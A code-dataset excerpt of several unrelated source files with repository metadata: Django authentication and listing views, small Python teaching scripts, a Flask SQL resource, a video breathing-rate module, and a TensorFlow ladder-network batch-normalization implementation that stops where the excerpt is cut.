a1eeaddd15d2c948ed131f7a126f1ce98e9c1c6c | c8f023c1e2c9ecb9ffe328044ef3f013de0857a7 | /src/apps/authentication/views.py | 2523e22d739640c45818632c83a2d47a605d0269 | [
"MIT"
] | permissive | snicoper/django-boilerplate | 851932459fca8b4a6c9220d8ad3ca8f94b14b7a2 | 88cc24c3a2e935fd1be139368288cae6c38679e4 | refs/heads/master | 2021-01-18T18:40:36.633342 | 2018-10-15T07:54:59 | 2018-10-15T07:54:59 | 29,604,293 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,839 | py | from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model, views
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.sites.shortcuts import get_current_site
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse, reverse_lazy
from django.utils.translation import ugettext as _
from django.views import generic
from utils.http import get_full_path
from utils.mail import send_templated_mail
from utils.mixins.views import AnonymousRequiredMixin
from .forms import AuthenticationForm, RegisterUserForm, UserEmailUpdateForm
from .models import RegisterUser, UserEmailUpdate
UserModel = get_user_model()
class RegisterUserFormView(AnonymousRequiredMixin, generic.CreateView):
template_name = 'authentication/register.html'
form_class = RegisterUserForm
model = RegisterUser
def __init__(self, *args, **kwargs):
"""Elimina posibles usuarios expirados."""
RegisterUser.objects.delete_expired_users_temp()
super().__init__(*args, **kwargs)
def get_success_url(self):
"""Si todo OK, envía el email para verificación y redirecciona."""
self._send_email_with_token()
return reverse('authentication:success')
def _send_email_with_token(self):
"""Envía un email con token para terminar proceso de registro."""
current_site = get_current_site(self.request)
site_name = current_site.name
url_validate_token = get_full_path(
self.request,
'authentication:validate_token',
token=self.object.token
)
context = {
'username': self.object.username,
'email': self.object.email,
'site_name': site_name,
'url_validate_token': url_validate_token
}
send_templated_mail(
subject=_(f'Validación de email en {site_name}'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[self.object.email],
context=context,
template_text='authentication/emails/register_success.txt'
)
class RegisterUserSuccessView(AnonymousRequiredMixin, generic.TemplateView):
template_name = 'authentication/success.html'
class RegisterUserValidateTokenView(AnonymousRequiredMixin, generic.TemplateView):
"""Validación email de un nuevo registro a través del token."""
template_name = 'authentication/validate_token.html'
def get(self, request, *args, **kwargs):
RegisterUser.objects.delete_expired_users_temp()
token = self.kwargs.get('token')
try:
user_temp = RegisterUser.objects.get(token=token)
except RegisterUser.DoesNotExist:
return render(request, 'authentication/token_not_exists.html')
RegisterUser.objects.move_user_tmp_to_users(UserModel, user_temp)
messages.success(request, _('El registro se ha completado con éxito'))
return redirect(reverse('authentication:login'))
class LoginView(AnonymousRequiredMixin, views.LoginView):
template_name = 'authentication/login.html'
form_class = AuthenticationForm
class LogoutView(LoginRequiredMixin, views.LogoutView):
template_name = 'authentication/logged_out.html'
class PasswordResetView(AnonymousRequiredMixin, views.PasswordResetView):
template_name = 'authentication/password_reset_form.html'
email_template_name = 'authentication/emails/password_reset_email.html'
subject_template_name = 'authentication/emails/password_reset_subject.txt'
success_url = reverse_lazy('authentication:password_reset_done')
class PasswordResetDoneView(AnonymousRequiredMixin, views.PasswordResetDoneView):
template_name = 'authentication/password_reset_done.html'
class PasswordResetConfirmView(AnonymousRequiredMixin, views.PasswordResetConfirmView):
template_name = 'authentication/password_reset_confirm.html'
success_url = reverse_lazy('authentication:password_reset_complete')
class PasswordResetCompleteView(AnonymousRequiredMixin, views.PasswordResetCompleteView):
template_name = 'authentication/password_reset_complete.html'
class PasswordChangeView(views.PasswordChangeView):
template_name = 'authentication/password_change_form.html'
success_url = reverse_lazy('authentication:password_change_done')
class PasswordChangeDoneView(views.PasswordChangeDoneView):
template_name = 'authentication/password_change_done.html'
class UserEmailUpdateView(LoginRequiredMixin, generic.FormView):
template_name = 'authentication/email_update.html'
form_class = UserEmailUpdateForm
model = UserEmailUpdate
def get_initial(self):
"""Establece datos en los campos del form."""
initial = super().get_initial()
initial['user'] = self.request.user.id
initial['token'] = UserEmailUpdate.objects.generate_unique_token()
initial['new_email'] = self.request.user.email
return initial
def form_valid(self, form):
"""Envía el email de confirmación."""
new_email = form.cleaned_data['new_email']
token = form.cleaned_data['token']
UserEmailUpdate.objects.update_or_create(
defaults={'new_email': new_email, 'token': token},
user=self.request.user
)
self._send_confirm_email_for_validate(token, new_email)
return super().form_valid(form)
def get_success_url(self):
msg = _('Se ha enviado un email a la nueva dirección para la confirmación')
messages.success(self.request, msg)
return reverse('accounts:profile')
def _send_confirm_email_for_validate(self, token, new_email):
"""Envía un email para la confirmación del nuevo email con un token."""
current_site = get_current_site(self.request)
url_validate_token = get_full_path(
self.request,
'authentication:email_update_validate',
token=token
)
context = {
'url_validate_token': url_validate_token,
'site_name': current_site.name
}
send_templated_mail(
subject=_('Confirmación cambio de email'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[new_email],
context=context,
template_text='authentication/emails/email_update_confirm.txt'
)
class UserEmailUpdateValidateView(LoginRequiredMixin, generic.View):
"""Verifica el token de cambio de email.
Para mayor seguridad, el usuario ha de estar logueado.
Una vez comprobado y actualizado el nuevo email, elimina el
email temporal.
"""
def get(self, request, *args, **kwargs):
"""Comprueba el token que coincida."""
token = kwargs.get('token')
try:
email_update = UserEmailUpdate.objects.get(token=token, user=request.user)
except UserEmailUpdate.DoesNotExist:
return redirect('authentication:token_email_not_exists')
self.request.user.email = email_update.new_email
self.request.user.save()
email_update.delete()
messages.success(request, _('Se ha actualizado el email'))
return redirect(reverse('accounts:profile'))
class UserEmailUpdateNotFoundView(generic.TemplateView):
"""El token no existe o no pertenece al usuario."""
template_name = 'authentication/token_email_not_exists.html'
class UserRemoveEmailUpdateView(generic.View):
"""Eliminar un email no confirmado por parte del usuario."""
def post(self, request, *args, **kwargs):
get_object_or_404(UserEmailUpdate, user=request.user).delete()
messages.success(request, _('Email eliminado con éxito'))
return redirect(reverse('accounts:profile'))
| [
"snicoper@gmail.com"
] | snicoper@gmail.com |
35e18800b81d35fa9973f7655fda15f7e69df8ad | f90ae105f8a55c26df0b30432312aea5b0a802ff | /oop_多态.py | c017fc479d8423f11599f096e855a6f233075242 | [] | no_license | zhaijingzhen/crazypython | 10ee6703394c32bccceaa459ebcf38789cb54a5b | cbbb7fb930aa76e649857d85e3c79840207d9752 | refs/heads/master | 2021-01-06T14:22:46.118674 | 2020-02-18T12:49:14 | 2020-02-18T12:49:14 | 241,358,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | #面向对象三大特征:封装(定义类的过程)、多态、继承
#多态 同一方法在不同的类中,有不同的功能
#数字类
#1+1
#字符串类
#'1'+'1'
class Triangle:
def __init__(self,width,height): #初始化
self.width = width
self.height = height
def getArea(self):
area = self.width * self.height /2
return area
class Square:
def __init__(self,size): #初始化
self.size = size
def getArea(self):
area = self.size * self.size
return area
a = Triangle(6,8)
print(a.getArea())
b = Square(9)
print(b.getArea())
#以上代码实现了,getArea方法在两个不同的类中,使用了不同的方法,这就是多态
| [
"noreply@github.com"
] | zhaijingzhen.noreply@github.com |
03556908a641b7f1722eee090e9e4b0fd97f67f0 | 591832a19a36d061004873e3818ef3e141322aba | /alternatives/BreathingRateDetection/modules.py | f7b6079ff572a3d49514360be03dad989ea351a5 | [] | no_license | amhfmnn/Breathing | ff7fddaf039964cd66092b0a0e4abc8359cbf51a | 9c0732b95767d15c940151993f5ca08b749ad4dc | refs/heads/master | 2020-04-30T22:27:45.111348 | 2019-06-24T11:39:48 | 2019-06-24T11:39:48 | 177,120,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,245 | py | """
Contains all the bindings to the modules.
To change the backend of a module, alter the _modules dict accordingly
"""
import cv2
import numpy as np
from parameters import getParam
from buildpyr import buildPyr
def getRegion(frames):
print(frames.shape)
#Selection region of interest in the video stream
rect_img = frames[(400, 700)[1]: (900, 1080)[1], (400, 700)[0]: (900, 1080)[0]]
print("new Shape")
print(rect_img.shape)
return rect_img
#Crop the Sample of Frames which are used for compution
def crop(frames, boundingRects):
return frames, boundingRects
def preProcess(vid):
print("New shape=")
print(vid.shape)
vid2 = []
idx = getParam["pyramidLevel"]
depth = getParam["pyramidDepth"]
for i in range(vid.shape[0]):
img2 = cv2.cvtColor(vid[i],cv2.COLOR_BGR2GRAY)
lpr, gpr = buildPyr(img2,depth)
vid2.append(lpr[idx])
vid = np.array(vid2)
return vid
from fft import *
_modules = {
"RegionOfInterest": getRegion,
"Crop": crop,
"PreProcessing": preProcess,
"Fourier Transform": applyFFT,
"Band Pass": bandPass,
"Select Frequency": searchFreq,
}
def getModule(modName):
return _modules[modName]
| [
"amin.hofmann@guest.hpi.de"
] | amin.hofmann@guest.hpi.de |
3d29a9eb23ae4bb4f0465775640ecd43fee68587 | e559ea08e3e0be40dbc7ec305613f5d2ed8f286c | /custdet.py | 987d261443fae212c529840992302accd626aeeb | [] | no_license | chinnuts/petro-tech | 24e5cea072de2a3d77cd4fa4c9d14d5561cf9bc8 | 166360dcbe4e3ed61bb076f4b6adbea234900af6 | refs/heads/main | 2023-06-09T17:11:01.086048 | 2021-07-01T04:35:57 | 2021-07-01T04:35:57 | 377,558,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | num=int(input("enter a number"))
if num%2==0:
print("is even number")
else:
print("is odd number") | [
"noreply@github.com"
] | chinnuts.noreply@github.com |
18cca05e8062f4f535054f5fd1a51304be50beb2 | 052275c2dd6d59a0d0fcfe85591b44106343662b | /listings/urls.py | a3b13c17beedfeffab4f7f72383dfe1ae84efa0b | [] | no_license | nimadorostkar/Django-Real-Estate | 93d104ad1847674103e525ae428af186fffa9e30 | bf868e49bb4703e4081d8e7e9fd5e3ae23fc9af9 | refs/heads/master | 2023-08-10T17:07:29.829253 | 2021-09-19T10:55:47 | 2021-09-19T10:55:47 | 338,533,461 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | from django.urls import path
from .views import (ListingListView, ListingDetailView, search)
urlpatterns = [
path('', ListingListView.as_view(), name='listings'),
path('<int:pk>', ListingDetailView.as_view(), name='listing'),
path('search', search, name='search'),
]
| [
"nimadorostkar97@gmail.com"
] | nimadorostkar97@gmail.com |
2cda3853e761f6d519daa85cf1d79d90c0d87cc9 | a76401f82ed1c9ac47ddaff27681b90f37627426 | /.history/student_olx/main/views_20210924131359.py | 35fb68992b698ce129f2c918d7cfea964bc30afc | [] | no_license | RiteshK555/itw-project | e90e1dd13517ee8b07d72cc3bd5a42af367ab587 | a2e4c8682c2030ff77da9ade5ae4677bd475f87a | refs/heads/master | 2023-08-30T03:48:58.904979 | 2021-11-10T09:50:59 | 2021-11-10T09:50:59 | 410,032,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | from django.http.response import HttpResponseRedirect
from django.shortcuts import render,redirect
from .models import product
from registration.models import money
# Create your views here.
from django.http import HttpResponse
from .forms import CreateNewProduct
# def buy(request,id):
# if request.method == 'POST':
# print(id)
# return render(request,"main/home.html")
def index(request,id):
a_product=product.objects.get(id=id)
all_products=product.objects.all()
buyer_money=money(holder=request.user)
# buyer_money=buyer_money-
return render(request,"main/home.html",{"products":all_products})
def home(response):
all_products=product.objects.all()
return render(response,"main/home.html",{"products":all_products})
def sell(response):
if response.method == "POST":
form=CreateNewProduct(response.POST,response.FILES)
if form.is_valid():
form.save()
# p_n=form.cleaned_data["product_name"]
# d=form.cleaned_data["description"]
# m=product(product_name=p_n,description=d)
# m.save()
return render(response,"main/home.html")
else:
form=CreateNewProduct()
return render(response,"main/sell.html",{"form":form})
def buy(response):
return render(response,"main/buy.html",{})
| [
""
] | |
56003591278ea79bc261ec1237431cd6e010f8ae | c3c558f6c4e85997499551f202e507e3aca0ccf5 | /resources/Tipo_Resource.py | a56930bf3da7204fedcd622274016948c60ac631 | [] | no_license | DanielFerreira11/DASHBOARD-MASTER | 869a861094bce28e8cf1f81fc6c3f19f6b6e6efb | 448ee21b696a0e091a9175d620e27473bb31b6fd | refs/heads/master | 2020-06-01T12:20:22.182597 | 2019-06-07T16:50:01 | 2019-06-07T16:50:01 | 190,777,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | #Fazendo consultas do numero de acidentes por tipo de veículo
from flask_restful import Resource, marshal_with, abort
from database.PgConector import *
class Tipo_Veiculo(Resource):
# GET Acidentes
def get(self):
sql = 'select tipo_veiculo, count(tipo_veiculo) from public."MyData" group by tipo_veiculo'
#Consulta SQL
cur.execute(sql)
acidentePesquisa = cur.fetchall()
#acidentePesquisa = cur.fetchall()[0]
return acidentePesquisa
| [
"noreply@github.com"
] | DanielFerreira11.noreply@github.com |
8192fb51ed0b55daa40bef01c2f160c9fdcc29e5 | 0a414f7514099328799805c5e8b0d5668a6c040d | /models.py | c3321bb9e3a0bd426b791774a71c365a173316b3 | [] | no_license | mkabelitz/ladder | 8118d9519ec7084720470f7910a8496e728521a0 | d4d6943a2abc7931276080aa0ab573d5fd9a6da3 | refs/heads/master | 2021-01-16T18:55:05.024897 | 2017-09-25T09:59:09 | 2017-09-25T09:59:09 | 100,124,146 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,852 | py | import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.layers import convolutional as convolutional_layers
from tensorflow.python.layers import core as core_layers
from tensorflow.python.layers import normalization as normalization_layers
from tensorflow.python.layers import pooling as pooling_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.training import moving_averages
def batch_normalization(x,
mean,
variance,
offset,
scale,
variance_epsilon,
name=None,
noise_std=None):
r"""Batch normalization.
As described in http://arxiv.org/abs/1502.03167.
Normalizes a tensor by `mean` and `variance`, and applies (optionally) a
`scale` \\(\gamma\\) to it, as well as an `offset` \\(\beta\\):
\\(\frac{\gamma(x-\mu)}{\sigma}+\beta\\)
`mean`, `variance`, `offset` and `scale` are all expected to be of one of two
shapes:
* In all generality, they can have the same number of dimensions as the
input `x`, with identical sizes as `x` for the dimensions that are not
normalized over (the 'depth' dimension(s)), and dimension 1 for the
others which are being normalized over.
`mean` and `variance` in this case would typically be the outputs of
`tf.nn.moments(..., keep_dims=True)` during training, or running averages
thereof during inference.
* In the common case where the 'depth' dimension is the last dimension in
the input tensor `x`, they may be one dimensional tensors of the same
size as the 'depth' dimension.
This is the case for example for the common `[batch, depth]` layout of
fully-connected layers, and `[batch, height, width, depth]` for
convolutions.
`mean` and `variance` in this case would typically be the outputs of
`tf.nn.moments(..., keep_dims=False)` during training, or running averages
thereof during inference.
Args:
x: Input `Tensor` of arbitrary dimensionality.
mean: A mean `Tensor`.
variance: A variance `Tensor`.
offset: An offset `Tensor`, often denoted \\(\beta\\) in equations, or
None. If present, will be added to the normalized tensor.
scale: A scale `Tensor`, often denoted \\(\gamma\\) in equations, or
`None`. If present, the scale is applied to the normalized tensor.
variance_epsilon: A small float number to avoid dividing by 0.
name: A name for this operation (optional).
Returns:
the normalized, scaled, offset tensor.
"""
with ops.name_scope(name, "batchnorm", [x, mean, variance, scale, offset]):
inv = math_ops.rsqrt(variance + variance_epsilon)
if scale is not None:
inv *= scale
if noise_std:
x = _noise(x, noise_std)
return x * inv + (offset - mean * inv
if offset is not None else -mean * inv)
@slim.layers.add_arg_scope
def custom_batch_norm(inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
activation_fn=None,
param_initializers=None,
param_regularizers=None,
updates_collections=ops.GraphKeys.UPDATE_OPS,
is_training=True,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
batch_weights=None,
data_format='NHWC',
zero_debias_moving_mean=False,
scope=None,
renorm=False,
renorm_clipping=None,
renorm_decay=0.99,
noise_std=None):
"""Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Can be used as a normalizer function for conv2d and fully_connected.
Note: when training, the moving_mean and moving_variance need to be updated.
By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
need to be added as a dependency to the `train_op`. For example:
```python
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss)
```
One can set updates_collections=None to force the updates in place, but that
can have a speed penalty, especially in distributed settings.
Args:
inputs: A tensor with 2 or more dimensions, where the first dimension has
`batch_size`. The normalization is over all but the last dimension if
`data_format` is `NHWC` and the second dimension if `data_format` is
`NCHW`.
decay: Decay for the moving average. Reasonable values for `decay` are close
to 1.0, typically in the multiple-nines range: 0.999, 0.99, 0.9, etc.
Lower `decay` value (recommend trying `decay`=0.9) if model experiences
reasonably good training performance but poor validation and/or test
performance. Try zero_debias_moving_mean=True for improved stability.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
epsilon: Small float added to variance to avoid dividing by zero.
activation_fn: Activation function, default set to None to skip it and
maintain a linear activation.
param_initializers: Optional initializers for beta, gamma, moving mean and
moving variance.
param_regularizers: Optional regularizer for beta and gamma.
updates_collections: Collections to collect the update ops for computation.
The updates_ops need to be executed with the train_op.
If None, a control dependency would be added to make sure the updates are
computed in place.
is_training: Whether or not the layer is in training mode. In training mode
it would accumulate the statistics of the moments into `moving_mean` and
`moving_variance` using an exponential moving average with the given
`decay`. When it is not in training mode then it would use the values of
the `moving_mean` and the `moving_variance`.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional collections for the variables.
outputs_collections: Collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
batch_weights: An optional tensor of shape `[batch_size]`,
containing a frequency weight for each batch item. If present,
then the batch normalization uses weighted mean and
variance. (This can be used to correct for bias in training
example selection.)
fused: Use nn.fused_batch_norm if True, nn.batch_normalization otherwise.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
zero_debias_moving_mean: Use zero_debias for moving_mean. It creates a new
pair of variables 'moving_mean/biased' and 'moving_mean/local_step'.
scope: Optional scope for `variable_scope`.
renorm: Whether to use Batch Renormalization
(https://arxiv.org/abs/1702.03275). This adds extra variables during
training. The inference is the same for either value of this parameter.
renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
scalar `Tensors` used to clip the renorm correction. The correction
`(r, d)` is used as `corrected_value = normalized_value * r + d`, with
`r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
dmax are set to inf, 0, inf, respectively.
renorm_decay: Momentum used to update the moving means and standard
deviations with renorm. Unlike `momentum`, this affects training
and should be neither too small (which would add noise) nor too large
(which would give stale estimates). Note that `decay` is still applied
to get the means and variances for inference.
Returns:
A `Tensor` representing the output of the operation.
Raises:
ValueError: If `batch_weights` is not None and `fused` is True.
ValueError: If `param_regularizers` is not None and `fused` is True.
ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
ValueError: If the rank of `inputs` is undefined.
ValueError: If rank or channels dimension of `inputs` is undefined.
"""
layer_variable_getter = slim.layers._build_variable_getter()
with variable_scope.variable_scope(
scope, 'BatchNorm', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
# Determine whether we can use the core layer class.
if (batch_weights is None and
updates_collections is ops.GraphKeys.UPDATE_OPS and
not zero_debias_moving_mean):
# Use the core layer class.
axis = 1 if data_format == 'NCHW' else -1
if not param_initializers:
param_initializers = {}
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer())
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer())
moving_mean_initializer = param_initializers.get(
'moving_mean', init_ops.zeros_initializer())
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer())
if not param_regularizers:
param_regularizers = {}
beta_regularizer = param_regularizers.get('beta')
gamma_regularizer = param_regularizers.get('gamma')
layer = normalization_layers.BatchNormalization(
axis=axis,
momentum=decay,
epsilon=epsilon,
center=center,
scale=scale,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer,
moving_mean_initializer=moving_mean_initializer,
moving_variance_initializer=moving_variance_initializer,
beta_regularizer=beta_regularizer,
gamma_regularizer=gamma_regularizer,
trainable=trainable,
renorm=renorm,
renorm_clipping=renorm_clipping,
renorm_momentum=renorm_decay,
name=sc.name,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs, training=is_training)
# Add variables to collections.
slim.layers._add_variable_to_collections(
layer.moving_mean, variables_collections, 'moving_mean')
slim.layers._add_variable_to_collections(
layer.moving_variance, variables_collections, 'moving_variance')
if layer.beta:
slim.layers._add_variable_to_collections(layer.beta, variables_collections, 'beta')
if layer.gamma:
slim.layers._add_variable_to_collections(
layer.gamma, variables_collections, 'gamma')
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
# Not supported by layer class: batch_weights argument,
# and custom updates_collections. In that case, use the legacy BN
# implementation.
# Custom updates collections are not supported because the update logic
# is different in this case, in particular w.r.t. "forced updates" and
# update op reuse.
if renorm:
raise ValueError('renorm is not supported with batch_weights, '
'updates_collections or zero_debias_moving_mean')
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
if batch_weights is not None:
batch_weights = ops.convert_to_tensor(batch_weights)
inputs_shape[0:1].assert_is_compatible_with(batch_weights.get_shape())
# Reshape batch weight values so they broadcast across inputs.
nshape = [-1] + [1 for _ in range(inputs_rank - 1)]
batch_weights = array_ops.reshape(batch_weights, nshape)
if data_format == 'NCHW':
moments_axes = [0] + list(range(2, inputs_rank))
params_shape = inputs_shape[1:2]
# For NCHW format, rather than relying on implicit broadcasting, we
# explicitly reshape the params to params_shape_broadcast when computing
# the moments and the batch normalization.
params_shape_broadcast = list(
[1, inputs_shape[1].value] + [1 for _ in range(2, inputs_rank)])
else:
moments_axes = list(range(inputs_rank - 1))
params_shape = inputs_shape[-1:]
params_shape_broadcast = None
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined channels dimension %s.' % (
inputs.name, params_shape))
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if not param_initializers:
param_initializers = {}
if center:
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer())
beta = variables.model_variable('beta',
shape=params_shape,
dtype=dtype,
initializer=beta_initializer,
collections=beta_collections,
trainable=trainable)
if scale:
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer())
gamma = variables.model_variable('gamma',
shape=params_shape,
dtype=dtype,
initializer=gamma_initializer,
collections=gamma_collections,
trainable=trainable)
# Create moving_mean and moving_variance variables and add them to the
# appropriate collections. We disable variable partitioning while creating
# them, because assign_moving_average is not yet supported for partitioned
# variables.
partitioner = variable_scope.get_variable_scope().partitioner
try:
variable_scope.get_variable_scope().set_partitioner(None)
moving_mean_collections = utils.get_variable_collections(
variables_collections, 'moving_mean')
moving_mean_initializer = param_initializers.get(
'moving_mean', init_ops.zeros_initializer())
moving_mean = variables.model_variable(
'moving_mean',
shape=params_shape,
dtype=dtype,
initializer=moving_mean_initializer,
trainable=False,
collections=moving_mean_collections)
moving_variance_collections = utils.get_variable_collections(
variables_collections, 'moving_variance')
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer())
moving_variance = variables.model_variable(
'moving_variance',
shape=params_shape,
dtype=dtype,
initializer=moving_variance_initializer,
trainable=False,
collections=moving_variance_collections)
finally:
variable_scope.get_variable_scope().set_partitioner(partitioner)
# If `is_training` doesn't have a constant value, because it is a `Tensor`,
# a `Variable` or `Placeholder` then is_training_value will be None and
# `needs_moments` will be true.
is_training_value = utils.constant_value(is_training)
need_moments = is_training_value is None or is_training_value
if need_moments:
# Calculate the moments based on the individual batch.
if batch_weights is None:
if data_format == 'NCHW':
mean, variance = nn.moments(inputs, moments_axes, keep_dims=True)
mean = array_ops.reshape(mean, [-1])
variance = array_ops.reshape(variance, [-1])
else:
mean, variance = nn.moments(inputs, moments_axes)
else:
if data_format == 'NCHW':
mean, variance = nn.weighted_moments(inputs, moments_axes,
batch_weights, keep_dims=True)
mean = array_ops.reshape(mean, [-1])
variance = array_ops.reshape(variance, [-1])
else:
mean, variance = nn.weighted_moments(inputs, moments_axes,
batch_weights)
moving_vars_fn = lambda: (moving_mean, moving_variance)
if updates_collections is None:
def _force_updates():
"""Internal function forces updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
with ops.control_dependencies([update_moving_mean,
update_moving_variance]):
return array_ops.identity(mean), array_ops.identity(variance)
mean, variance = utils.smart_cond(is_training,
_force_updates,
moving_vars_fn)
else:
def _delay_updates():
"""Internal function that delay updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
return update_moving_mean, update_moving_variance
update_mean, update_variance = utils.smart_cond(is_training,
_delay_updates,
moving_vars_fn)
ops.add_to_collections(updates_collections, update_mean)
ops.add_to_collections(updates_collections, update_variance)
# Use computed moments during training and moving_vars otherwise.
vars_fn = lambda: (mean, variance)
mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
else:
mean, variance = moving_mean, moving_variance
if data_format == 'NCHW':
mean = array_ops.reshape(mean, params_shape_broadcast)
variance = array_ops.reshape(variance, params_shape_broadcast)
beta = array_ops.reshape(beta, params_shape_broadcast)
if gamma is not None:
gamma = array_ops.reshape(gamma, params_shape_broadcast)
# Compute batch_normalization.
outputs = batch_normalization(inputs, mean, variance, beta, gamma,
epsilon, noise_std=noise_std)
outputs.set_shape(inputs_shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
# Function for adding batch normalization beta parameter
def _add_bias(data):
own_beta = tf.get_variable('own_beta', shape=data.get_shape()[-1], initializer=tf.constant_initializer(0.0))
return data + own_beta
# Function for scaling by batch normalization gamma parameter
def _apply_scale(data):
own_gamma = tf.get_variable('own_gamma', shape=data.get_shape()[-1], initializer=tf.constant_initializer(1.0))
return data * own_gamma
def _gamma_layer(data, activation_fn, is_training, is_unlabeled, noise_std, ema, bn_assigns):
with tf.variable_scope('enc', reuse=not is_training):
running_mean_enc = tf.get_variable('running_mean_enc', shape=[data.get_shape()[-1]], trainable=False,
initializer=tf.constant_initializer(0.0))
running_var_enc = tf.get_variable('running_var_enc', shape=[data.get_shape()[-1]], trainable=False,
initializer=tf.constant_initializer(1.0))
mean_enc, var_enc = tf.nn.moments(data, axes=[0])
if is_unlabeled:
assign_mean_enc = running_mean_enc.assign(mean_enc)
assign_var_enc = running_var_enc.assign(var_enc)
bn_assigns.append(ema.apply([running_mean_enc, running_var_enc]))
with tf.control_dependencies([assign_mean_enc, assign_var_enc]):
normalized_enc = (data - mean_enc) / tf.sqrt(var_enc + 1e-10)
elif is_training:
normalized_enc = (data - mean_enc) / tf.sqrt(var_enc + 1e-10)
else:
normalized_enc = (data - ema.average(running_mean_enc)) / tf.sqrt(ema.average(running_var_enc) + 1e-10)
z_tilde = _noise(normalized_enc, noise_std)
with tf.variable_scope('bn_correct', reuse=not is_training):
bn_corrected_tilde = _apply_scale(_add_bias(z_tilde))
h_tilde = activation_fn(bn_corrected_tilde)
z = normalized_enc
with tf.variable_scope('bn_correct', reuse=True):
bn_corrected = _apply_scale(_add_bias(z))
h = activation_fn(bn_corrected)
with tf.variable_scope('dec', reuse=not is_training):
running_mean_dec = tf.get_variable('running_mean_dec', shape=[data.get_shape()[-1]], trainable=False,
initializer=tf.constant_initializer(0.0))
running_var_dec = tf.get_variable('running_var_dec', shape=[data.get_shape()[-1]], trainable=False,
initializer=tf.constant_initializer(1.0))
mean_dec, var_dec = tf.nn.moments(h_tilde, axes=[0])
if is_unlabeled:
assign_mean_dec = running_mean_dec.assign(mean_dec)
assign_var_dec = running_var_dec.assign(var_dec)
bn_assigns.append(ema.apply([running_mean_dec, running_var_dec]))
with tf.control_dependencies([assign_mean_dec, assign_var_dec]):
normalized_dec = (h_tilde - mean_dec) / tf.sqrt(var_dec + 1e-10)
elif is_training:
normalized_dec = (h_tilde - mean_dec) / tf.sqrt(var_dec + 1e-10)
else:
normalized_dec = (h_tilde - ema.average(running_mean_dec)) / tf.sqrt(ema.average(running_var_dec) + 1e-10)
with tf.variable_scope('g', reuse=not is_training):
z_est = _g(z_tilde, normalized_dec)
return h_tilde, h, z_est, z
def _leaky_relu(features, name=None):
alpha = 0.1
return tf.maximum(features, alpha * features)
def _g_m(u):
